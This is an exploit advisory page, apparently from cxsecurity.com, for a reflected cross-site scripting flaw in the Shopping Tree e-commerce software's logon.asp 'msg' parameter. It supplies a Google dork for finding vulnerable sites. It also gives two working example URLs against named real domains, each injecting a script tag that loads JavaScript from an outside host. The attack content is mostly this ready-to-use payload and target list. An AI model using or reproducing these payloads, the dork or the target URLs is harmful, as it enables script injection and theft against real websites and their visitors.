Shopping Tree Cross Site Scripting

2012.08.14
Credit: Nafsh
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: \"Shopping Tree, Inc\"

########################################################################################################################################### # Exploit Title: Shopping Tree Cross Site Scripting # Google Dork: "Shopping Tree, Inc" # Date: 14/08/2012 # Author: Iranian_Dark_Coders_Team # Discovered By : Nafsh # Site : http://idc-team.net/ # Software Link: http://www.shoppingtree.com ########################################################################################################################################## # Bug : /logon.asp?msg= [Xss] ########################################################################################################################################### # Example : # # http://www.refuah.co.il/admin/logon.asp?msg=%22%3E%3Cscript%20src%3d//santanafest.com.br/enquete/c%3E%3C/script%3E # www.islam1.co/hatahet1/logon.asp?msg=%22%3E%3Cscript%20src%3d//santanafest.com.br/enquete/c%3E%3C/script%3E ########################################################################################################################################### # Special Thanks To : All Of IDC-Team Members ###########################################################################################################################################

References:

http://idc-team.net/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top